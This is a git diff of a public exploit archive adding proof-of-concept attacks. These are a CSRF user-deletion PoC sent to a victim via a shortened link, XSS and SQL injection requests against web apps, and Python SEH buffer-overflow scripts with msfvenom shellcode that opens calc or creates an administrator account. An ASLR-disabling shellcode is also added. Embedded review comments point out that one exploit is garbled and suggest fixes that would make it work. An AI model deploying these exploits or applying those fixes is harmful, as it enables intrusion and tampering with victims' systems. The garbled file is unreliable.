@@ -0,0 +1,41 @@ +# Exploit Title: Integria IMS 5.0.83 - Cross-Site Request Forgery +# Exploit Author: Javier Olmedo +# Website: https://hackpuntes.com +# Date: 2018-12-19 +# Google Dork: N/A +# Vendor: Artica ST +# Software Link: https://github.com/articaST/integriaims +# Affected Version: 5.0.83 and possibly before +# Patched Version: 5.0.84 +# Category: Web Application +# Platform: Windows & Ubuntu +# Tested on: Win10x64 & Kali Linux +# CVE: 2018-19829 +# References: +# https://hackpuntes.com/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/ +# https://github.com/articaST/integriaims/commit/a37c0c3d7cad74df64bfd3d98488aee4fa28b839 + +# 1. Technical Description: +# Integria IMS version 5.0.83 and possibly before are affected by Cross-Site Request Forgery +# vulnerability, an attacker could delete users through GET or POST requests. + +# 2.1 Proof Of Concept (Delete User): + +(Method 1 - GET) +Use Google URL Shortener (or similar) to shorten the next url +http://[PATH]/ajax.php?page=include/ajax/delete_item_general&delete_item=1&name=delete_user&id=[ID]) +and send it to the victim. + +(Method 2 - POST) +Use next form and send it tho the victim. + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/46014.txt b/exploits/php/webapps/46014.txt new file mode 100644 index 000000000..71404f0ec --- /dev/null +++ b/exploits/php/webapps/46014.txt 
@@ -0,0 +1,37 @@ +# Exploit Title: Bolt CMS <3.6.2 - Cross-Site Scripting +# Google Dork: N/A +# Date: 2018-12-18 +# Exploit Author: Raif Berkay Dincel [ author=9567 ] +# Contact: www.raifberkaydincel.com +# Vendor Homepage: bolt.cm +# Vulnerable Software --> [ https://github.com/rdincel1/Bolt-CMS-3.6.2---Cross-Site-Scripting/raw/master/bolt-v3.6.2.zip ] +# Affected Version: [ < 3.6.2 ] +# CVE-ID: CVE-2018-19933 +# Tested on: Parrot Security OS / Linux Mint / Windows 10 + +# Vulnerable Parameter Type: POST +# Vulnerable Parameter: http://127.0.0.1:8000/preview/page +# Attack Pattern: + +# Description + +Bolt CMS <3.6.2 allows XSS via text input click preview button as demonstrated by the Title field of a Configured and New Entry. + +# PoC [Video]: https://youtu.be/3eTPyIpjCJg + +# Proof of Concepts: + +POST /preview/page HTTP/1.1 +Host: 127.0.0.1:8000 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1:8000/bolt/editcontent/pages +Content-Type: application/x-www-form-urlencoded +Content-Length: 396 +Connection: close +Cookie: bolt_session_cf7976ea5999f8e272ce7cd50c84d240=14b61865131cf9422af970ae28a097b7; bolt_authtoken_cf7976ea5999f8e272ce7cd50c84d240=0b69633d5a549f19bf3faa88462b7b8e17ba57ba9dff6d25a708efe6dd6a9a04 +Upgrade-Insecure-Requests: 1 + +content_edit%5B_token%5D=jMmm41dJQXpXx3gwE_VQkA60fdsNo6DERJClPVkYh7U&editreferrer=&contenttype=pages&title=%3Cscript%3Ealert%28%22Raif%22%29%3C%2Fscript%3E&slug=script-alert-raif-script&image%5Bfile%5D=&files%5B%5D=&teaser=&body=&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2018-12-07+00%3A12%3A05&datedepublish=&ownerid=1&_live-editor-preview= \ No newline at end of file 
diff --git a/exploits/php/webapps/46015.txt b/exploits/php/webapps/46015.txt new file mode 100644 index 000000000..3ee96b807 --- /dev/null +++ b/exploits/php/webapps/46015.txt @@ -0,0 +1,19 @@ +# Exploit Title: SQL Injection in Yeswiki (Cercopitheque) +# Date: 02/07/2018 +# Exploit Author: Mickael BROUTY (@ark1nar) - FIDENS +# Vendor Homepage: https://yeswiki.net +# Software Link: https://repository.yeswiki.net/cercopitheque/yeswiki-cercopitheque-2018-12-07-1.zip +# Version: Yeswiki Cercopitheque 2018-06-19-1 +# Tested on: Kali linux +# CVE : CVE-2018-13045 + + +# POC: +# 1) +# http://localhost/[PATH]/?BaZar&vue=exporter&id=[SQL] +# + + +Exploitation example: + +http://localhost/[PATH]/?BaZar&vue=exporter&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15# \ No newline at end of file diff --git a/exploits/windows/local/46008.py b/exploits/windows/local/46008.py new file mode 100755 index 000000000..873eb2e9a --- /dev/null +++ b/exploits/windows/local/46008.py 
@@ -0,0 +1,59 @@
+# Exploit Title: PassFab RAR Password Recovery SEH Local Exploit
+# Date: 16-12-2018
+# Vendor Homepage:https://www.passfab.com/products/rar-password-recovery.html
+# Software Link: https://www.passfab.com/downloads/passfab-rar-password-recovery.exe
+# Exploit Author: Achilles
+# Tested Version: 9.3.2
+# Tested on: Windows XP SP3
+
+
+# 1.- Run python code : PassFab_RAR
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open PassFab RAR Password Recovery
+# 4.- In the new Window click on the key in the upper right corner
+# 5.- Paste the content of EVIL.txt into the Field: 'Licensed E-mail and Registration Code'
+# 6.- Click 'Register'and the calculator will open
+# 7.- Greetings go:XiDreamzzXi,Metatron
+
+#!/usr/bin/python
+
+#!/usr/bin/env python
+buffer = "\x41" * 260
+NSEH = "\xeb\x06\x90\x90" #jmp short 6
+SEH = "\xdd\x74\x06\x10" #pop pop ret SoftwareLog.dll
+nops = "\x90" * 20
+
+#badchar \x00\
+#msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python
+buf = ""
+buf += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d"
+buf += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5"
+buf += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde"
+buf += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb"
+buf += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32"
+buf += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84"
+buf += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27"
+buf += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3"
+buf += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5"
+buf += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8"
+buf += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3"
+buf += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78"
+buf += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15"
+buf += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a"
+buf += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05"
+buf += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b"
+buf += 
"\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26" +buf += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82" +buf += "\x8e\x2a\x79\xdb" + +payload = buffer + NSEH + SEH + nops + buf + + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/local/46009.py b/exploits/windows/local/46009.py new file mode 100755 index 000000000..c725255f0 --- /dev/null +++ b/exploits/windows/local/46009.py 
@@ -0,0 +1,108 @@
+#!/usr/bin/python
+
+#------------------------------------------------------------------------------------------------------------------------------------#
+# Exploit: LanSpy 2.0.1.159 - Local Buffer Overflow RCE(PoC) #
+# Date: 2018-12-16 #
+# Author: Juan Prescotto #
+# Tested Against: Win7 Pro SP1 64 bit #
+# Software Download #1: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe #
+# Software Download #2: https://lizardsystems.com/download/lanspy_setup.exe #
+# Version: 2.0.1.159 #
+# Special Thanks to my wife for allowing me spend countless hours on this passion of mine #
+# Credit: Thanks to Gionathan "John" Reale (https://www.exploit-db.com/exploits/45968) for his work on the Denial of Service exploit #
+# Steps : Open the APP > click on the scan field > paste in contents from the .txt file that was generated by this script #
+#------------------------------------------------------------------------------------------------------------------------------------#
+# Bad Characers: \x00 thru \x20 and \x2c\x2d #
+# EIP Offset: 680 #
+# Non-Participating Modules: lanspy.exe #
+#------------------------------------------------------------------------------------------------------------------------------------#
+# Run LanSpy with Administrative Rights, when exploit.txt contents are pasted into scan field and run a Local User will be created: #
+# User: Metasploit Password: MyPassword12 #
+#------------------------------------------------------------------------------------------------------------------------------------#
+# EIP overwrite --> JMP ECX --> Short Relative Reverse JMP --> Long Relative Reverse JMP --> NoPs --> Stack Adjustment --> Shellcode #
+#------------------------------------------------------------------------------------------------------------------------------------#
+
+#msfvenom -p windows/adduser USER=metasploit PASS=MyPassword12 --bad-chars 
\x00\x01\x02\x03\x04\x05\x06\x07\x09\x0a\x0b\x0c\x0d\x0f\x10\x11\x12\x13\x14\x1a\x1b\x1c\x1d\x1e\x1f\x2c --format python -v shellcode
+#Payload size: 626 bytes
+
+shellcode = ""
+shellcode += "\x89\xe5\xda\xd1\xd9\x75\xf4\x5b\x53\x59\x49\x49"
+shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
+shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
+shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
+shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+shellcode += "\x39\x6c\x39\x78\x6b\x32\x65\x50\x45\x50\x73\x30"
+shellcode += "\x31\x70\x6d\x59\x58\x65\x36\x51\x4f\x30\x43\x54"
+shellcode += "\x6c\x4b\x56\x30\x70\x30\x6e\x6b\x63\x62\x54\x4c"
+shellcode += "\x4e\x6b\x66\x32\x65\x44\x6c\x4b\x54\x32\x47\x58"
+shellcode += "\x76\x6f\x68\x37\x30\x4a\x31\x36\x75\x61\x69\x6f"
+shellcode += "\x6e\x4c\x75\x6c\x35\x31\x43\x4c\x55\x52\x36\x4c"
+shellcode += "\x45\x70\x4b\x71\x78\x4f\x76\x6d\x65\x51\x69\x57"
+shellcode += "\x6d\x32\x4c\x32\x33\x62\x53\x67\x4c\x4b\x61\x42"
+shellcode += "\x42\x30\x6c\x4b\x31\x5a\x47\x4c\x6e\x6b\x50\x4c"
+shellcode += "\x52\x31\x54\x38\x6a\x43\x47\x38\x75\x51\x7a\x71"
+shellcode += "\x46\x31\x4c\x4b\x36\x39\x35\x70\x47\x71\x38\x53"
+shellcode += "\x4e\x6b\x43\x79\x67\x68\x39\x73\x35\x6a\x73\x79"
+shellcode += "\x4e\x6b\x34\x74\x6c\x4b\x75\x51\x6a\x76\x35\x61"
+shellcode += "\x4b\x4f\x4c\x6c\x7a\x61\x48\x4f\x64\x4d\x67\x71"
+shellcode += "\x68\x47\x37\x48\x6b\x50\x32\x55\x39\x66\x33\x33"
+shellcode += "\x53\x4d\x4a\x58\x37\x4b\x43\x4d\x65\x74\x52\x55"
+shellcode += "\x38\x64\x73\x68\x6e\x6b\x46\x38\x75\x74\x73\x31"
+shellcode += "\x78\x53\x72\x46\x6e\x6b\x54\x4c\x30\x4b\x6e\x6b"
+shellcode += "\x63\x68\x75\x4c\x36\x61\x58\x53\x6e\x6b\x47\x74"
+shellcode += "\x6c\x4b\x35\x51\x68\x50\x4b\x39\x50\x44\x46\x44"
+shellcode += "\x54\x64\x61\x4b\x73\x6b\x53\x51\x56\x39\x43\x6a"
+shellcode += "\x53\x61\x6b\x4f\x79\x70\x63\x6f\x53\x6f\x62\x7a"
+shellcode += "\x4e\x6b\x54\x52\x5a\x4b\x4e\x6d\x61\x4d\x72\x4a"
+shellcode += "\x46\x61\x6c\x4d\x4d\x55\x78\x32\x57\x70\x55\x50" +shellcode += "\x63\x30\x52\x70\x62\x48\x34\x71\x6c\x4b\x32\x4f" +shellcode += "\x4b\x37\x59\x6f\x4e\x35\x6d\x6b\x6c\x30\x78\x35" +shellcode += "\x6e\x42\x71\x46\x61\x78\x59\x36\x6d\x45\x4f\x4d" +shellcode += "\x6f\x6d\x79\x6f\x4e\x35\x57\x4c\x57\x76\x43\x4c" +shellcode += "\x57\x7a\x4d\x50\x4b\x4b\x4d\x30\x61\x65\x43\x35" +shellcode += "\x4d\x6b\x31\x57\x54\x53\x44\x32\x52\x4f\x33\x5a" +shellcode += "\x75\x50\x72\x73\x4b\x4f\x69\x45\x73\x53\x50\x6d" +shellcode += "\x62\x44\x54\x6e\x51\x75\x44\x38\x65\x35\x31\x30" +shellcode += "\x66\x4f\x35\x33\x31\x30\x42\x4e\x33\x55\x61\x64" +shellcode += "\x77\x50\x52\x55\x63\x43\x50\x65\x61\x62\x67\x50" +shellcode += "\x52\x4d\x51\x75\x54\x34\x73\x51\x61\x63\x70\x70" +shellcode += "\x50\x6c\x70\x6f\x63\x59\x64\x34\x55\x70\x50\x4d" +shellcode += "\x31\x69\x50\x50\x70\x61\x74\x33\x44\x33\x54\x37" +shellcode += "\x42\x4f\x34\x32\x73\x54\x34\x71\x54\x72\x67\x50" +shellcode += "\x54\x6f\x32\x61\x51\x54\x77\x34\x71\x30\x76\x46" +shellcode += "\x36\x46\x31\x30\x30\x6e\x51\x75\x31\x64\x55\x70" +shellcode += "\x70\x6c\x42\x4f\x70\x63\x70\x61\x70\x6c\x70\x67" +shellcode += "\x72\x52\x30\x6f\x72\x55\x44\x30\x35\x70\x51\x51" +shellcode += "\x73\x54\x42\x4d\x55\x39\x72\x4e\x50\x69\x71\x63" +shellcode += "\x32\x54\x34\x32\x31\x71\x70\x74\x50\x6f\x54\x32" +shellcode += "\x64\x33\x51\x30\x30\x6d\x35\x35\x64\x34\x70\x61" +shellcode += "\x70\x73\x32\x50\x32\x4c\x70\x6f\x45\x39\x71\x64" +shellcode += "\x77\x50\x56\x4f\x72\x61\x43\x74\x63\x74\x63\x30" +shellcode += "\x41\x41" + +if len(shellcode) > 633: + exit("[+] Shellcode is too big! 
Shellcode must be smaller than 633 bytes")
+
+sled = "\x90" * 8
+
+#Necessary to allow shellcode room to operate
+stack_adjust = "\x83\xec\x78" * 10
+
+reverse_jmp_long = "\xe9\x5c\xfd\xff\xff"
+
+reverse_jmp_short = "\x41\xeb\xf6\x41"
+
+junk = "\x41" * (680 - len(sled) - len(stack_adjust) - len(shellcode) - len(reverse_jmp_long) - len(reverse_jmp_short))
+
+#004040AD JMP ECX (lanspy.exe)
+eip = "\xad\x40\x40"
+
+payload = sled + stack_adjust + shellcode + junk + reverse_jmp_long + reverse_jmp_short + eip
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/46016.py b/exploits/windows/local/46016.py
new file mode 100755
index 000000000..9c1bdcc7c
--- /dev/null
+++ b/exploits/windows/local/46016.py
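Review bot: The size guard relies on the `exit()` helper that the `site` module injects at startup rather than on `sys.exit`, so it raises NameError when the script runs under `python -S` or is imported; add `import sys` and call `sys.exit(...)` instead. The message is also off by one: `junk` is `680 - 8 - 30 - 5 - 4 - len(shellcode)`, so a 633-byte shellcode still fits exactly and the text should read "must be at most 633 bytes". The header comment says the created account is `User: Metasploit` while the recorded msfvenom line passes `USER=metasploit`; one of the two should be corrected so the documentation matches the payload.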
@@ -0,0 +1,57 @@
+# Exploit Title: PDF Explorer SEH Local Exploit
+# Original Discovery:Gionathan "John" Reale (DoS exploit)
+# Exploit Author: Achilles
+# Date: 18-12-2018
+# Vendor Homepage: http://www.rttsoftware.com/
+# Software Link: https://www.rttsoftware.com/files/PDFExplorerTrialSetup.zip
+# Tested Version: 1.5.66.2
+# Tested on: Windows XP SP3
+
+
+# 1.- Run python code : PDF_Explorer.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open PDF Explorer
+# 4.- When inside the program click "Database" > "Custom fields settings...
+"
+# 5.- Paste the content of EVIL.txt into the Field:'Label'and the calculator will Open
+# 7.- Greetings go:XiDreamzzXi,Metatron
+
+
+#!/usr/bin/python
+#!/usr/bin/env python
+buffer =3D "\x41" * 292
+NSEH =3D "\xeb\x06\x90\x90" #jmp short 6
+SEH =3D "\x3f\x28\xd1\x72" #0x72d1283f pop eax # pop esi # ret 0x04 [msacm32.drv]
+nops =3D "\x90" * 20
+
+#msfvenom -p windows/exec CMD=3Dcalc.exe -b "\x00\x0a\x0d\x23\x80" -f pytho=
+n
+schellcode =3D ("\xda\xcb\xbf\xbd\x81\x73\x52\xd9\x74\x24\xf4\x5e\x29"=20
+"\xc9\xb1\x31\x31\x7e\x18\x03\x7e\x18\x83\xc6\xb9\x63"
+"\x86\xae\x29\xe1\x69\x4f\xa9\x86\xe0\xaa\x98\x86\x97"
+"\xbf\x8a\x36\xd3\x92\x26\xbc\xb1\x06\xbd\xb0\x1d\x28"
+"\x76\x7e\x78\x07\x87\xd3\xb8\x06\x0b\x2e\xed\xe8\x32"
+"\xe1\xe0\xe9\x73\x1c\x08\xbb\x2c\x6a\xbf\x2c\x59\x26"
+"\x7c\xc6\x11\xa6\x04\x3b\xe1\xc9\x25\xea\x7a\x90\xe5"
+"\x0c\xaf\xa8\xaf\x16\xac\x95\x66\xac\x06\x61\x79\x64"
+"\x57\x8a\xd6\x49\x58\x79\x26\x8d\x5e\x62\x5d\xe7\x9d"
+"\x1f\x66\x3c\xdc\xfb\xe3\xa7\x46\x8f\x54\x0c\x77\x5c"
+"\x02\xc7\x7b\x29\x40\x8f\x9f\xac\x85\xbb\x9b\x25\x28"
+"\x6c\x2a\x7d\x0f\xa8\x77\x25\x2e\xe9\xdd\x88\x4f\xe9"
+"\xbe\x75\xea\x61\x52\x61\x87\x2b\x38\x74\x15\x56\x0e"
+"\x76\x25\x59\x3e\x1f\x14\xd2\xd1\x58\xa9\x31\x96\x97"
+"\xe3\x18\xbe\x3f\xaa\xc8\x83\x5d\x4d\x27\xc7\x5b\xce"
+"\xc2\xb7\x9f\xce\xa6\xb2\xe4\x48\x5a\xce\x75\x3d\x5c"
+"\x7d\x75\x14\x3f\xe0\xe5\xf4\xee\x87\x8d\x9f\xee")
+
+payload =3D buffer + NSEH + SEH + nops + 
schellcode
+
+
+try:
+f=open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(payload)
+f.write(payload)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8dd0eeddd..237d12eec 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -3177,7 +3177,7 @@ id,file,description,date,author,type,platform,port
 24135,exploits/windows/dos/24135.html,"Microsoft Internet Explorer 5.0.1 - CSS Style Sheet Memory Corruption",2004-05-18,henkie_is_leet,dos,windows,
 24142,exploits/windows/dos/24142.pl,"Mollensoft Lightweight FTP Server 3.6 - Remote Denial of Service",2004-05-24,storm,dos,windows,
 24143,exploits/hardware/dos/24143.c,"VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,dos,hardware,
-24144,exploits/windows/dos/24144.txt,"MiniShare Server 1.3.2 - Remote Denial of Service",2004-05-26,"Donato Ferrante",dos,windows,
+24144,exploits/windows/dos/24144.txt,"MiniShare 1.3.2 - Remote Denial of Service",2004-05-26,"Donato Ferrante",dos,windows,
 24145,exploits/windows/dos/24145.c,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (1)",2004-05-25,badpack3t,dos,windows,
 24146,exploits/windows/dos/24146.bat,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (2)",2004-06-02,CoolICE,dos,windows,
 24147,exploits/windows/dos/24147.bat,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (3)",2004-06-02,CoolICE,dos,windows,
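Review bot: The file is archived in its quoted-printable form rather than decoded, so it is not valid Python as committed: every `=` appears as `=3D` (`buffer =3D "\x41" * 292`), the msfvenom comment is split by a soft line break (`pytho=` / `n`), and the first shellcode line carries a trailing `=20`. The bodies of the `try:` and `except:` blocks at the end are also not indented, which is an IndentationError even after decoding. The file should be decoded (the stdlib `quopri` module, `python -m quopri -d`, does this) and the try/except bodies re-indented before it is indexed; the PassFab file in the 46008.py hunk shows the intended layout. The step numbering in the header also jumps from 5 to 7.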
@@ -7486,7 +7486,7 @@ id,file,description,date,author,type,platform,port
 15344,exploits/linux/local/15344.c,"Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite",2010-10-28,"Kees Cook",local,linux,
 15376,exploits/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel",2010-11-01,"Nikita Tarakanov",local,windows,
 15403,exploits/windows/local/15403.py,"MiniShare 1.4.0 < 1.5.5 - 'users.txt' Local Buffer Overflow",2010-11-02,"Chris Gabriel",local,windows,
-15406,exploits/windows/local/15406.rb,"MiniShare 1.5.5 - Local Buffer Overflow (SEH)",2010-11-03,"Muhamad Fadzil Ramli",local,windows,
+15406,exploits/windows/local/15406.rb,"MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (SEH)",2010-11-03,"Muhamad Fadzil Ramli",local,windows,
 15417,exploits/windows/local/15417.pl,"GSPlayer 1.83a Win32 Release - Local Buffer Overflow",2010-11-04,moigai,local,windows,
 15461,exploits/windows/local/15461.c,"G Data TotalCare 2011 - Local Kernel",2010-11-08,"Nikita Tarakanov",local,windows,
 15475,exploits/multiple/local/15475.txt,"IBM OmniFind - Local Privilege Escalation",2010-11-09,"Fatih Kilic",local,multiple,
@@ -10154,6 +10154,10 @@ id,file,description,date,author,type,platform,port
 45985,exploits/windows/local/45985.rb,"CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)",2018-12-13,Metasploit,local,windows,
 45988,exploits/windows/local/45988.py,"Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)",2018-12-14,"Manpreet Singh Kheberi",local,windows,
 46005,exploits/windows/local/46005.py,"Nsauditor 3.0.28.0 - Local SEH Buffer Overflow",2018-12-18,Achilles,local,windows,
+46006,exploits/linux/local/46006.c,"Linux Kernel 4.4 - 'rtnetlink' Stack Memory Disclosure",2018-12-19,"Jinbum Park",local,linux,
+46008,exploits/windows/local/46008.py,"PassFab RAR 9.3.2 - Buffer Overflow (SEH)",2018-12-19,Achilles,local,windows,
+46009,exploits/windows/local/46009.py,"LanSpy 2.0.1.159 - Local Buffer Overflow",2018-12-19,"Juan Prescotto",local,windows,
+46016,exploits/windows/local/46016.py,"PDF Explorer 1.5.66.2 - Buffer Overflow (SEH)",2018-12-19,Achilles,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -11456,7 +11460,7 @@ id,file,description,date,author,type,platform,port
 9862,exploits/hardware/remote/9862.txt,"3Com OfficeConnect - Code Execution",2009-10-19,"Andrea Fabizi",remote,hardware,
 9886,exploits/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)",2009-10-16,"Pankaj Kohli_ Trancer",remote,windows,
 9893,exploits/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption (MS09-054)",2009-10-15,Skylined,remote,windows,80
-9896,exploits/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 - Remote Buffer Overflow",2009-10-19,iM4n,remote,windows,80
+9896,exploits/windows/remote/9896.txt,"MiniShare 1.5.5 - Remote Buffer Overflow",2009-10-19,iM4n,remote,windows,80
 9900,exploits/windows/remote/9900.txt,"NaviCOPA 3.0.1.2 - Source Disclosure",2009-10-14,Dr_IDE,remote,windows,
 9902,exploits/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Remote Buffer Overflow",2009-10-26,"karak0rsan_ murderkey",remote,windows,80
 9905,exploits/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 < 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",remote,windows,1521
@@ -17013,7 +17017,7 @@ id,file,description,date,author,type,platform,port
 45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization RCE (Metasploit)",2018-12-04,Metasploit,remote,windows,8080
 45986,exploits/hardware/remote/45986.py,"Cisco RV110W - Password Disclosure / Command Execution",2018-12-14,RySh,remote,hardware,443
 45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,
-45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method",2018-12-18,"Rafael Pedrero",remote,windows,80
+45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow",2018-12-18,"Rafael Pedrero",remote,windows,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40501,3 +40505,10 @@ id,file,description,date,author,type,platform,port
 45995,exploits/php/webapps/45995.txt,"Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution",2018-12-14,"Ihsan Sencan",webapps,php,
 45997,exploits/php/webapps/45997.txt,"Double Your Bitcoin Script Automatic - Authentication Bypass",2018-12-14,Veyselxan,webapps,php,
 46000,exploits/xml/webapps/46000.txt,"SDL Web Content Manager 8.5.0 - XML External Entity Injection",2018-12-18,"Ahmed Elhady Mohamed",webapps,xml,
+46010,exploits/php/webapps/46010.html,"Hotel Booking Script 3.4 - Cross-Site Request Forgery (Change Admin Password)",2018-12-19,"Sainadh Jamalpur",webapps,php,80
+46011,exploits/php/webapps/46011.rb,"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)",2018-12-19,AkkuS,webapps,php,
+46012,exploits/php/webapps/46012.txt,"Integria IMS 5.0.83 - 'search_string' Cross-Site Scripting",2018-12-19,"Javier Olmedo",webapps,php,80
+46013,exploits/php/webapps/46013.html,"Integria IMS 5.0.83 - Cross-Site Request Forgery",2018-12-19,"Javier Olmedo",webapps,php,80
+46014,exploits/php/webapps/46014.txt,"Bolt CMS < 3.6.2 - Cross-Site Scripting",2018-12-19,"Raif Berkay Dincel",webapps,php,80
+46015,exploits/php/webapps/46015.txt,"Yeswiki Cercopitheque - 'id' SQL Injection",2018-12-19,"Mickael BROUTY",webapps,php,80
+46017,exploits/multiple/webapps/46017.txt,"IBM Operational Decision Manager 8.x - XML External Entity Injection",2018-12-19,"Mohamed M.Fouad",webapps,multiple,9443
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 60c3ec110..912b07553 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -926,3 +926,4 @@ id,file,description,date,author,type,platform
 45940,shellcodes/linux/45940.nasm,"Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)",2018-12-04,Nelis,shellcode,linux
 45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64
 45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86
+46007,shellcodes/linux_x86-64/46007.c,"Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)",2018-12-19,"Kağan Çapar",shellcode,linux_x86-64
diff --git a/shellcodes/linux_x86-64/46007.c b/shellcodes/linux_x86-64/46007.c
new file mode 100644
index 000000000..c9d7de699
--- /dev/null
+++ b/shellcodes/linux_x86-64/46007.c
@@ -0,0 +1,85 @@
+/*
+ ASLR (Address Space Layout Randomization) Disable Shellcode Language C & ASM - Linux/x86_64
+
+ Author : Kağan Çapar
+ contact: kagancapar@gmail.com
+ shellcode len : 93 bytes
+ compilation: gcc -fno-stack-protector -z execstack [.c] -o []
+
+ Test:
+ run shellcode (./aslr etc.)
+ check : cat /proc/sys/kernel/randomize_va_space
+ you will see "0"
+
+ Assembly:
+
+ global _start
+ section .ASLR
+ _start:
+
+ #6A3B push byte +0x3b
+ #58 pop eax
+ #99 cdq
+ #48 dec eax
+ #BB2F62696E mov ebx,0x6e69622f
+ #2F das
+ #7368 jnc 0x75
+ #005348 add [ebx+0x48],dl
+ #89E7 mov edi,esp
+ #682D630000 push dword 0x632d
+ #48 dec eax
+ #89E6 mov esi,esp
+ #52 push edx
+ #E836000000 call 0x56
+ #6563686F arpl [gs:eax+0x6f],bp
